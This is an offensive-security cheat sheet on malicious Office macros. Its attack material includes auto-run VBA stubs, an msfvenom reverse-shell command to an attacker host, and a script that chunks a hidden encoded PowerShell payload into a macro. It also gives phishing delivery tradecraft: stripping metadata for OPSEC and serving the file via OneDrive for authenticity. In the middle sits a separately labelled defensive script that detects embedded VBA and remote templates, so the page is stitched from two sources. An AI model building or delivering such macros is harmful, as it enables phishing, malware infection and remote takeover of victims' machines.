Microsoft Office documents can contain macros: script snippets that normally extend document functionality but can be used maliciously, for example to launch reverse shells. Microsoft has lately relaxed the restriction on untrusted macros. See VBA for macro syntax.
Auto-run Macros

Macros do not run on their own, but they can be made to run automatically when the document is opened through AutoOpen and Document_Open.

```vba
' Executed when new document is opened
Sub AutoOpen()
    MyMacro
End Sub

' Executed when already-opened document is reopened
Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    CreateObject("Wscript.Shell").Run "cmd"
End Sub
```

Reverse Shells
See: reverse shell
Generate via msfvenom

See: msfvenom

```shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.131 LPORT=8888 -f hta-psh
```

Generate from existing PowerShell payload
VBA has a 50-character limit for string literals, so use a Python script to split an existing PowerShell payload into chunks that VBA reassembles by concatenation.

```python
# Split a long PowerShell one-liner into 50-character chunks and emit
# the VBA that rebuilds it by string concatenation
payload = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQ....."
n = 50

print("Sub MyMacro()")
print("    Dim Str As String")
for i in range(0, len(payload), n):
    print('    Str = Str + "' + payload[i:i + n] + '"')
print("    Shell(Str)")
print("End Sub")
```

Combined with the auto-run stubs from above, the script produces a VBA macro like the following:
```vba
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
    Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
    ' ...
    Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
    Str = Str + "QA="
    CreateObject("Wscript.Shell").Run Str
End Sub
```

Delivering the Macro
A macro must be saved in either a .doc file (old Word document format) or a .docm file (macro-enabled document format), as .docx cannot store macros. It can also be saved to a .dotm (Word template file), and the macro will be available to any document linked to that template as long as the .dotm file is reachable at the embedded URL.
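The container formats listed above are exactly what a mail gateway or analyst script checks before a document reaches a user. The following is an added example, not code from the original page: it inspects the OOXML zip of a Word file for an embedded VBA project (the `word/vbaProject.bin` part that .docm and .dotm carry and .docx does not) and for an attached template that resolves to an external URL, which is how a macro in a remote .dotm gets pulled in. The sample documents are constructed in memory and the template URL is a placeholder; legacy .doc files are OLE compound files rather than zips and need an OLE parser (oletools' olevba is the usual choice), so they are only reported here.

```python
"""Added example (not from the original page): container-level triage of a
Word document for embedded VBA and externally attached templates. Samples are
constructed in memory; the template URL is a placeholder."""
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE_REL = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # compound file header used by .doc/.dot


def inspect_word_container(data: bytes) -> dict:
    """Return macro and remote-template indicators for a Word file's bytes."""
    if data.startswith(OLE_MAGIC):
        return {"container": "ole", "vba_project": None, "remote_templates": [],
                "note": "legacy .doc/.dot: parse the OLE streams with olevba"}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return {"container": "unknown", "vba_project": None, "remote_templates": []}

    remote = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        has_vba = "word/vbaProject.bin" in names
        # settings.xml's relationships point at the attached template; an
        # External TargetMode means Word fetches it from the given URL
        rels_name = "word/_rels/settings.xml.rels"
        if rels_name in names:
            root = ET.fromstring(z.read(rels_name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("Type") == ATTACHED_TEMPLATE_REL and rel.get("TargetMode") == "External":
                    remote.append(rel.get("Target"))
    return {"container": "ooxml", "vba_project": has_vba, "remote_templates": remote}


def is_suspicious(report: dict) -> bool:
    """Worth quarantining if the file carries VBA or fetches a template remotely."""
    return bool(report["vba_project"]) or bool(report["remote_templates"])


# --- constructed samples ---
def _zip(parts: dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


_MINIMAL = {"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<document/>"}

SAMPLE_DOCX_CLEAN = _zip(_MINIMAL)
SAMPLE_DOCM = _zip({**_MINIMAL, "word/vbaProject.bin": OLE_MAGIC + b"\x00" * 8})
SAMPLE_DOCX_REMOTE_TEMPLATE = _zip({
    **_MINIMAL,
    "word/settings.xml": b"<settings/>",
    "word/_rels/settings.xml.rels": (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_REL}" '
        'Target="http://placeholder.invalid/template.dotm" TargetMode="External"/>'
        "</Relationships>"
    ).encode(),
})
SAMPLE_LEGACY_DOC = OLE_MAGIC + b"\x00" * 504

if __name__ == "__main__":
    for label, blob in [("clean docx", SAMPLE_DOCX_CLEAN), ("docm", SAMPLE_DOCM),
                        ("remote template", SAMPLE_DOCX_REMOTE_TEMPLATE), ("legacy doc", SAMPLE_LEGACY_DOC)]:
        report = inspect_word_container(blob)
        print(f"{label}: suspicious={is_suspicious(report)} {report}")
```

The remote-template check is the one that catches a .docx with no macro of its own: the document is clean on disk, and the VBA arrives only when Word resolves the external attachedTemplate relationship at open time, so blocking or logging that URL is as useful as blocking the macro itself.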
Here are some email templates for sending within OWA.
OPSEC warning!

Make sure to remove all PII metadata from the document before delivery. To do so, go to File > Info > Check for Issues > Inspect Document. After clicking Inspect, click Remove All next to "Document Properties and Personal Information."
Serve file with OneDrive

Recommendation: Use services such as OneDrive to deliver the document for more authenticity.